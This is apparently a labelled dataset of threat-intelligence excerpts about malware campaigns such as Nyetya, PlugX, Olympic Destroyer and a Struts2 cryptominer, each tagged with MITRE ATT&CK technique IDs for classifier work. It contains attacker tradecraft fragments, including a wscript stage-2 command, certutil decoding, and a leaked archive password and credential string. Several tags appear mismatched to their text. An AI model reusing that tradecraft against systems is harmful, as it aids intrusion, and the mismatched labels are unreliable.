{"text1":"Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999. Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18. All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space. This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java. The exact file downloaded depends on the victim's system architecture","labels":"['T1053.003']"}
{"text1":"Note that regardless of whether Nyetya is successful in overwriting the boot sector or not, it will proceed to create a scheduled task via schtasks to reboot the system one hour after infection","labels":"['T1529', 'T1053.005']"}
{"text1":"Upon execution, Pay2Key is reading the Server and Port keys from the configuration file. If a configuration file was not found in the current working directory and wasn\u2019t supplied in the command line arguments, the ransomware will write \u201cno config file found\u201d to a file at .\\Cobalt-Client-log.txt. This log file will be used extensively by the ransomware during its execution. Newer versions of the ransomware are making sure to remove this log file from the disk. The full list of supported log messages can be found in the appendix section of this article","labels":"['T1070.004']"}
{"text1":"This script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable. In this particular instance, the payload is encoded via base64, which certutil decodes. The payload in question is a CAB file that is then unpacked. Finally, the malware executes the extracted install.bat script before deleting the original files and exiting","labels":"['T1027']"}
{"text1":"Path \u2013 location of the root \u201cstash\u201d directory - Ext \u2013 search for files with one of these extensions only - Date \u2013 search for files not earlier than this date","labels":"['T1083']"}
{"text1":"TA505 continued distributing Dridex through early June 2017 using a range of email attachments. Most recently these included PDF attachments with embedded Microsoft Word documents bearing malicious macros that call PowerShell commands that install Dridex","labels":"['T1566.001']"}
{"text1":"The Delphi variant of Zebrocy delivered in this attack campaign are very similar to the Delphi downloader discussed in our previous Zebrocy research published in June 2018. While this Delphi variant was known, the C# and VB.NET variants delivered in this attack campaign were previously unknown. An interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed. While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed","labels":"['T1027.002']"}
{"text1":"While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload\u2019s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. Generally, malware loads a DLL, iterates over the set of exports of the DLL and hashes the string, looking for a matching hash. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name","labels":"['T1027']"}
{"text1":"Torisma uses this method to send data back to the C2 server read from the named pipe. This is the results of the execution of the shellcode on the victim\u2019s system through the ViewPrevPage action and the results of this execution are sent and processed using this function","labels":"['T1041']"}
{"text1":"Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. To date, we have only collected 14 samples of this variant, indicating it may be sparingly used. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file\u2019s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include","labels":"['T1059.003']"}
{"text1":"Mustang Panda APT uses a package of binaries to load the actual payload and it is intentionally designed this way to bypass file scanners and sandboxes. Obviously, file scanners or sandboxes can\u2019t detect the PlugX payload without the encrypted DAT file","labels":"['T1027.001']"}
{"text1":"HOLMIUM has been observed using various vectors for initial access, including spear-phishing email, sometimes carrying archive attachments that exploit the CVE-2018-20250 vulnerability in WinRAR, and password-spraying. Many of their recent attacks, however, have involved the penetration testing tool Ruler used in tandem with compromised Exchange credentials","labels":"['T1110.003']"}
{"text1":"Completing missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft","labels":"['T1021.001']"}
{"text1":"L\u201cServicesActive\u201d: This string is passed to the OpenSCManagerW API to retrieve active services. expand 32-byte kexpand 16-byte\u201d: The constants used by the Salsa20 symmetric encryption algorithm","labels":"['T1106']"}
{"text1":"It creates the folder \"\\ProgramData\\AuditService\\\" and copies the clean file \"lsass.exe\" (taken from \"\\Windows\\System32\\\") into the folder. The tainted \"services.exe\" installs \"\\ProgramData\\AuditService\\lsass.exe\" as an autostart Windows service named \"Audit Service\". When the new \"lsass.exe\" service autostarts, the malicious file \"sspisrv.dll\" sideloads in the same folder. lsass.exe\" will eventually crash because of a failure to load other dependencies","labels":"['T1543.003', 'T1569.002']"}
{"text1":"Companies in multiple sectors are targeted in this campaign, including those operating in the automotive, pharmaceutical, and engineering sector, as well as managed service providers (MSPs","labels":"['T1078']"}
{"text1":"Use of trusted channels: BoomBox is a uniquely developed downloader used to obtain a later-stage payload from an actor-controlled Dropbox account. All initial communications leverage the Dropbox API via HTTPS. Opportunity for restraint: Consistent with other tools utilized by NOBELIUM, BoomBox, VaporRage, and some variants of NativeZone conduct some level of profiling on an affected system\u2019s environment. Ambiguity: VaporRage is a unique shellcode loader seen as the third-stage payload. VaporRage can download, decode, and execute an arbitrary payload fully in-memory. Such design and deployment patterns, which also include staging of payloads on a compromised website, hamper traditional artifacts and forensic investigations, allowing for unique payloads to remain undiscovered","labels":"['T1071.001']"}
{"text1":"The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the \"Typing replaces selection\" property is enabled in Microsoft Word. The VBA functions trigger when the victim types any content into the maldoc. Appdata%\\desktop.iniThe next stage of the VBS is run using wscript.exe using a command such as:%windir%\\System32\\wscript.exe \/\/e:vbscript \/\/b <path_to_Stage_2>Macros dropping VBS to disk and running via wscript.exe","labels":"['T1204.002', 'T1059.005', 'T1059.005']"}
{"text1":"The stage 2 payload for the macOS X malware was decoded and analyzed. The stage 2 malware has a variety of functionalities. Most importantly, it checks in with a C2 and, after connecting to the C2, can send or receive a payload, read and write files, execute commands via the terminal, etc","labels":"['T1140']"}
{"text1":"Using the built-in expand.exe utility provided by Microsoft Windows, the dropper executes the following command, which will expand the CAB file and write the results to the provided directory","labels":"['T1140']"}
{"text1":"In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. Additionally, the process attempts to lower the overall security of the system by disabling security features in Microsoft Office and Windows Defender. The payloads themselves are rather interesting, as the developer wraps the malicious code with legitimate source code freely available online","labels":"['T1204.002']"}
{"text1":"This data is gathered into an information structure which the RAT zips with an 8 bytes random generated password, which is then XORed with one byte","labels":"['T1560']"}
{"text1":"On another occasion, CVE-2021-26411 was used, which is another exploit targeting Internet Explorer and legacy versions of Microsoft Edge. The redirect code was set up in the same way as CVE-2020-1380, the only difference being the exploit code used. The key part of the exploit code used is given in Figures 3 and 4","labels":"['T1203']"}
{"text1":"The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data","labels":"['T1003.006']"}
{"text1":"TA416 has used SMTP2Go to impersonate various European diplomatic organizations since at least 2020. In this historical campaign, TA416 delivered a DropBox URL that delivered a PlugX variant aligning with Recorded Future\u2019s\u00a0analysis\u00a0of \"Red Delta\" PlugX malware. Included below is a publicly available malicious Zip file hash from August 2020 delivered via a DropBox URL which is attributable to TA416\/Red Delta","labels":"['T1102']"}
{"text1":"One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are","labels":"['T1573.002']"}
{"text1":"The use of the web bug reconnaissance technique suggests TA416 is being more discerning about which targets the group chooses to deliver malware payloads. Historically, the group primarily delivered web bug URLs alongside malware URLs to confirm receipt. In 2022, the group started to first profile users and then deliver malware URLs. This may be an attempt by TA416 to avoid having their malicious tools discovered and publicly disclosed. By narrowing the lens of targeting from broad phishing campaigns to focus on targets that have proven to be active and willing to open emails, TA416 increases its chance of success when following up with malicious malware payloads","labels":"['T1566.002']"}
{"text1":"In such a situation, the malware will find and run the built-in Microsoft Windows InfDefaultInstall.exe program, which will install a DLL via an INF file. Should Tencent be installed, the malware will execute the InfDefaultInstall.exe program with an argument of \u2018QQMgr.inf\u2019. Otherwise, it will use \u2018hccutils.inf\u2019 as an argument","labels":"['T1574.002']"}
{"text1":"Multiple samples contain UAC bypass code for both 32 and 64-bit systems. The UAC bypass code is stored as 'DAT' in the file's resource section","labels":"['T1548.002']"}
{"text1":"On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry. Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It is worth noting that this email appeared to have been sent from another Taiwanese Government employee, implying that the email was sent from a valid but compromised account","labels":"['T1204.002', 'T1566.001']"}
{"text1":"After successful lateral movement, the attackers tried to establish persistency on selected servers \u2013targeting all domain controllers, but also other servers. To achieve persistency, they used WMI Event Subscription with a few different WMI objects","labels":"['T1018']"}
{"text1":"Figure 3 shows a code excerpt from the embedded macro that checks which\u00a0base64\u00a0blob should be decoded based on the\u00a0iCheck\u00a0variable, a\u00a0Boolean value\u00a0which is\u00a0set to true if the\u00a0victim system is running on a 64-bit system\u00a0and false on a 32-bit system. If the system is found to be 64-bit, the\u00a0base64\u00a0encoded blob on\u00a0the left\u00a0is decoded\u00a0otherwise\u00a0the\u00a0base64\u00a0encoded blob on\u00a0the right is decoded","labels":"['T1082']"}
{"text1":"The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The newly dropped executable is a loader Trojan responsible for installing and running the payload of this attack. Overall, SofacyCarberp does initial reconnaissance by gathering system information and sending it to the C2 server prior to downloading additional tools to the system. These differences include a new hashing algorithm to resolve API functions and to find running browser processes for injection, as well as changes to the C2 communication mechanisms as explained in detail within the appendix. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and\/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload","labels":"['T1105']"}
{"text1":"As Hui explains, this happens because ngrok.io URLs stay online for only around 12 hours, and by the time security researchers identify a new C&C URL, the ngrok.io link changes to a new one, hiding the botnet from researchers once more. This allows the botnet to survive more than other botnets that host C&C servers on popular hosting platforms where security firms can usually intervene via abuse requests","labels":"['T1568.002']"}
{"text1":"As mentioned, FALLCHILL was reported as the final payload for Celas Trade Pro. All FALLCHILL samples use 16-byte hardcoded RC4 keys for sending data, similar to the 16-byte keys in the AppleJeus samples","labels":"['T1573.001']"}
{"text1":"If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. The GET requests will be parsed by LitePower and invoked using PowerShell\u2019s IEX function","labels":"['T1059.001', 'T1071.001']"}
{"text1":"It only installs the second-stage script in the default registry value under the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot. Variant B registers a scheduled task named Sibot and programmed to run daily. This task, which is saved by Windows in the file C:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\WindowsUpdate\\sibot, runs the following command-line daily","labels":"['T1112']"}
{"text1":"The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system","labels":"['T1210']"}
{"text1":"networkDll32 Trickbot uses this encrypted module to scan the network and steal relevant network information. It executes the following commands to gather information on the infected system","labels":"['T1016']"}
{"text1":"Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource","labels":"['T1059.005']"}
{"text1":"The folder C:\\Users\\Public\\Administrador\\logs\\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images","labels":"['T1119']"}
{"text1":"The official AutoIt3 interpreter comes as part of the AutoIt installation package, and it is used by the malware to execute the compiled script. The VBS script runs the AutoIt interpreter, passing the compiled script as an argument. Once executed, it loads the library, which was also passed as an argument to call a hardcoded exported function","labels":"['T1059.005']"}
{"text1":"1) Resolves WINAPI functions 2) Hides its GUI using ShowWindow WINAPI call 3) Compares if the DLL is being ran by wmplayer","labels":"['T1564.003']"}
{"text1":"BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop","labels":"['T1102.001']"}
{"text1":"Throughout the years, Kimsuky has been using an array of malware in their operations. The infrastructure of some of the malware used by Kimsuky can be tracked using pattern analysis of the URI structures used by some of their tools. The following table maps commonly observed URI patterns to their respective malware","labels":"['T1566.001']"}
{"text1":"This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products. After a few months, Turla has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. PowerShell Loader . The PowerShell loader has three main steps: persistence, decryption and loading into memory of the embedded executable or library. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload. WMI consumer PowerShell command . Finally, the script stores the encrypted payload in the Windows registry. Hijacked profile.ps1 file . The base64-encoded PowerShell command is very similar to the one used in the WMI consumers. The key and the salt are also different for each script and are not stored in the script, but only in the WMI filter or in the profile.ps1 file. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools. Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools","labels":"['T1140']"}
{"text1":"This appears to be an implementation of hashbusting \u2014 a method of obfuscation in which a malware sample is subtly changed on the fly so each sample has a different checksum. As a result, the SHA256 hash of each payload downloaded from the sites in question appeared to be unique. However, the SSDEEP fuzzy hash of this sample was as follows","labels":"['T1027.005']"}
{"text1":"By using these methods, Kimsuky can gain login and password information and\/or launch malware outside of some application allowlisting solutions","labels":"['T1133']"}
{"text1":"Once delivered, Egregor will perform a sequence of language checks\u00a0in a similar manner to both Maze and Sekhmet, before attempting to enumerate all connected drives. If successful, it connects to a command and control (C2) server to grab a list of directories\u00a0present on the enumerated drives to search. Any files in these directories are then extracted and sent back to the C2 server","labels":"['T1039']"}
{"text1":"After the driver is loaded, the VSS service is disabled using the Control Service Manager. Following this, a number of additional threads are created. A thread is created to handle the system reboot. It will sleep for the time specified by a command line parameter of 35 minutes, at which point the system will be restarted by an API call to InitializeSystemShutdownExW","labels":"['T1134']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018net time' command to check the local time on the target system. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Use an advanced endpoint threat detection (AETD) solution to monitor activity on network endpoints. In particular, review network access for use of mobile USB modems on corporate systems","labels":"['T1124']"}
{"text1":"The hooked WriteFile procedure\u2019s main purpose is to save the file handle of the subject file to write and install another hook in the CloseHandle API function","labels":"['T1005']"}
{"text1":"The first of FIN7's new tools is BOOSTWRITE \u2013 an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators","labels":"['T1587.001']"}
{"text1":"The first layer of the FYAnti loader decrypts an embedded .NET module and executes it using the CppHostCLR technique. The .NET module is packed using \u201cConfuserEx v1.0.0\u201d and acts as yet another loader that searches for a file in the \u201cC:\\Windows\\Microsoft.NET\\\u201d directory with file sizes between 100,000 and 500,000","labels":"['T1027.002', 'T1083']"}
{"text1":"Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. While GDPR requirements prevented us from pivoting on Registrant information, the actors reused IP space, reused a certificate, and the aforementioned domain mimicking technique allowed for some pivoting. Toolset . Once gaining a foothold on a user\u2019s system, the threat actors behind STOLEN PENCIL use Microsoft\u2019s Remote Desktop Protocol (RDP) for remote point-and-click access. This means a human is behind the keyboard interacting with a compromised system, and not using a RAT (Remote Access Trojan) with a command-and-control site acting as a proxy between the threat actor and the compromised system. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL Logs keystrokes to %userprofile%\\appdata\\roaming\\apach. GREASE a tool to add a Windows administrator account with a specific username\/password and enable RDP, circumventing any firewall rules. defaultes\/1qaz2wsx#EDC - a tool to add a Windows administrator account with a specific username\/password and enable RDP, circumventing any firewall rules. Figure 5: Certificate used to sign MECHANICAL\/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Using a combination of stolen passwords, backdoor accounts, and a forced-open RDP service, the threat actors are likely to retain a foothold on a compromised system. Conclusion . While we were able to gain insight into the threat actor\u2019s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity","labels":"['T1078.003']"}
{"text1":"This simple backdoor is likely used as a second-chance backdoor to maintain access to the system, even if the primary malware is removed. It could also be used as a second-stage dropper to infect the system with additional malware","labels":"['T1105']"}
{"text1":"Layer 2 uses a classic Adobe Flash Player Vector corruption technique to develop its heap corruption vulnerability to a full relative read\/write available to ActionScript3. In this technique, the attacker sprays Adobe Flash Player Vectors to the heap, and triggers a write vulnerability to change the size of one of the vectors. For more details on this technique, see Flash in 2015","labels":"['T1203']"}
{"text1":"Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process","labels":"['T1059.001', 'T1489']"}
{"text1":"The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server","labels":"['T1105', 'T1059.003', 'T1071.004']"}
{"text1":"As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Check status, control, and end processes and services. Create, modify, and delete registry subkeys. Retrieve a list of logical drives","labels":"['T1083']"}
{"text1":"The actor then tested connectivity to an IP managed by the victim\u2019s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim\u2019s SOGU backdoor. This effectively routes SOGU malware traffic through the victim\u2019s service provider, which likely indicates a foothold on the service provider\u2019s network. The tactic also serves to mask malicious C2 and exfiltration traffic and make it appear innocuous","labels":"['T1090.002']"}
{"text1":"The malware component, test.exe, uses the Windows command \"cmd.exe\" \/C whoami\u201d to verify it is running with the elevated privileges of \u201cSystem\u201d and creates persistence by creating the following scheduled task","labels":"['T1059.003', 'T1053.005', 'T1033']"}
{"text1":"The download process is the same with the previous variant, the loader resolves the command and control server IP address using a hardcoded list of DNS servers and then downloads the corresponding file. An interesting addition, in the latest samples, is the use of an alternative command and control server IP address, in case the primary one fails. The alternative IP address is generated by applying a bitwise XOR operation to each byte of the resolved command and control IP address with the byte 0xFE. In addition, as a possible anti-behaviour method, the loader verifies that the command and control server IP address is not \u2018127.0.0.1\u2019. Both of these methods are also present in the latest Team9 backdoor variants","labels":"['T1008']"}
{"text1":"Audit all remote authentications from trusted networks or service providers. Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems. Log use of system administrator commands such as net, ipconfig, and ping","labels":"['T1133']"}
{"text1":"1) Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object. 2) Lock PowerShell Execution Policy, must be set to \u201cAllSigned\u201d via GPO. 3) An allowlisting solution to prevent certain process child-parent execution hierarchies","labels":"['T1559.002']"}
{"text1":"The main functionality of the macros remained the same as in a previous APT34 campaign: The malicious macros use the MouseAvailable function for evasion, and create a scheduled task to execute a payload embedded within the document","labels":"['T1053.005']"}
{"text1":"Since the 2016 publication, Microsoft has come across an evolution of PLATINUM\u2019s file-transfer tool, one that uses the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel for communication","labels":"['T1105']"}
{"text1":"Maze creates a mutex with the name \u201cGlobal\\x\u201d where x is a special value that is unique per machine. For example, in the next screenshot (some information has been deleted to anonymize the machine used for the analysis) is an example of this behavior","labels":"['T1047']"}
{"text1":"Additionally, one of the samples is able to capture screenshots of the infected system. To perform this task, the developer used the GDI API: A keylogger is also present in the analyzed sample. The SetWindowsHookEx() API is used to retrieve the stroked keys. The GetKeyNameText() API is used to retrieve a string that represents the name of a key. In addition to the key, the title of the foreground window is stored in order to known where the infected user is typing (by using the GetForegroundWindow() and GetWindowText() API","labels":"['T1113']"}
{"text1":"Endpoint Protection . Buckeye cyberespionage group shifts gaze from US to Hong Kong . Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Buckeye used a remote access Trojan (Backdoor.Pirpi) in attacks against a US organization\u2019s network in 2009. Symantec has identified additional tools used by the group, which will be discussed later. Organizations that Buckeye targeted over time, per region . Malware and tools . Buckeye uses a number of hacking tools as well as malware. Buckeye uses Backdoor.Pirpi, a remote access Trojan capable of reading, writing, and executing files and programs. As mentioned previously, Buckeye also uses a number of hacking tools, including the following: Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. On execution, the tool injects itself into lsass.exe and is triggered with the argument \u201cdig\u201d. OSinfo: OSInfo is a general purpose, system information gathering tool. It has the following command line argument help: ChromePass: A tool from NirSoft used for recovering passwords stored in the Chrome browser. This, coupled with the group\u2019s use of zero-day exploits in the past, customized tools, and the types of organizations being targeted would suggest that Buckeye is a state-sponsored cyberespionage group","labels":"['T1059.003']"}
{"text1":"Just like Rampant Kitten, both threat groups attempted to gather information from the Keepass password manager and changed the execution flow of Telegram Desktop to ensure the persistence of their malware","labels":"['T1555.005']"}
{"text1":"In this campaign, Palmerworm is also using stolen code-signing certificates to sign its payloads, which makes the payloads appear more legitimate and therefore more difficult for security\u00a0software to detect. Palmerworm has been publicly documented using stolen code-signing certificates in previous attack campaigns","labels":"['T1588.003']"}
{"text1":"After the malware is downloaded and files verified, the script will check in the C:\\Program Files\\ directory for the presence Avast antivirus, which happens to be the most common installed AV worldwide","labels":"['T1518.001']"}
{"text1":"Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Officials at the games confirmed some technical issues to non-critical systems and they completed recovery within around 12 hours. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. This feature explains why we discovered several samples with different sets of credentials that were collected from previously infected systems. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - \u25bc February (14) CannibalRAT targets Brazil Who Wasn\u2019t Responsible for Olympic Destroyer","labels":"['T1490']"}
{"text1":"To install a malicious shim database, the attacker invokes a Microsoft utility called sdbinst.exe through a PowerShell script","labels":"['T1059.001']"}
{"text1":"When connecting to web shells on a target network GALLIUM has been observed employing Taiwan-based servers. Observed IP addresses appear to be exclusive to GALLIUM, have little to no legitimate activity, and are reused in multiple operations. These servers provide high fidelity pivot points during an investigation","labels":"['T1583.004']"}
{"text1":"During this process, the adversary identifies data of interest from the network of the victim. This can be anything from file and directory-listings, configuration files, manuals, email stores in the guise of OST- and PST-files, file shares with intellectual property (IP), and data scraped from memory. If the data is small enough, it is exfiltrated through the command and control channel of the Cobalt Strike beacons. However, usually the data is compressed with WinRAR, staged on another system of the victim, and from there copied to a OneDrive-account controlled by the adversary","labels":"['T1114.001', 'T1083']"}
{"text1":"As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification","labels":"['T1132.001']"}
{"text1":"We attribute this campaign with high confidence to an actor named WIRTE, which is a lesser-known threat actor first publicly referenced by our colleagues at Lab52 in 2019. We further suspect, with low confidence, that the WIRTE group has relations with the Gaza Cybergang threat actor","labels":"['T1036.005']"}
{"text1":"1) QEMU Linux images. 2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start\/stop the mining based on CPU usage and whether the Activity Monitor process is running","labels":"['T1059.004']"}
{"text1":"Retefe is different from most banking Trojans, which typically attack web browser software to capture login credentials before they are encrypted with SSL and sent to the bank\u2019s web server. Instead, Retefe uses the Windows PowerShell to execute a series of commands that installs a new root certificate on the system and a proxy configuration to re-route the traffic to the targeted banking websites","labels":"['T1553.004']"}
{"text1":"Remote desktop available via VNC. Hidden Remote desktop available via RDPWrap. Privilege escalation (even for the latest Win10 updates) Remote WebCam control. Remote Shell. Remote desktop available via VNC. Hidden Remote desktop available via RDPWrap. Remote Shell. Remote desktop available via VNC. Hidden Remote desktop available via RDPWrap. Privilege escalation (even for the latest Win10 updates) - Remote WebCam control","labels":"['T1021.005']"}
{"text1":"The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process","labels":"['T1070.001']"}
{"text1":"The tool is used to hide the threat actors\u2019 tools and services. The tool\u2019s configuration was added to registry run keys on a victim\u2019s computer","labels":"['T1547.001', 'T1112']"}
{"text1":"When loaded with startup command 2, the installer can copy the original explorer.exe file inside its current running directory and rename d3d9.dll to uxtheme.dll. In this case the persistence is achieved by loading the original explorer.exe from its startup location and, using DLL side-loading, passing the execution control to the stage 4 malware (discussed in next section","labels":"['T1036.005']"}
{"text1":"After all the initial HTTP GET requests, the malware starts to gather JSON-formatted system data. For all the fixed drives in the system, the network module stores the disk name and size, as well as computer and user name, Windows directory, host IP, etc","labels":"['T1082']"}
{"text1":"Backdating, or timestomping, is a technique used by many threat actors which involves the manipulation of the creation timestamps or compilation date of a file in order to thwart analysis attempts (anti-forensics). It is suspected that the creation date of most of the files mentioned in this report were tampered with by the threat actors and backdated to 2016","labels":"['T1070.006']"}
{"text1":"KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine\u2019s energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms","labels":"['T1083']"}
{"text1":"RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. Usage is: %s shareIp domain\u00a0[USER INFORMATION||[USER NAME AND PASSWORD]] [\/run:[COMMAND","labels":"['T1569.002', 'T1053.005']"}
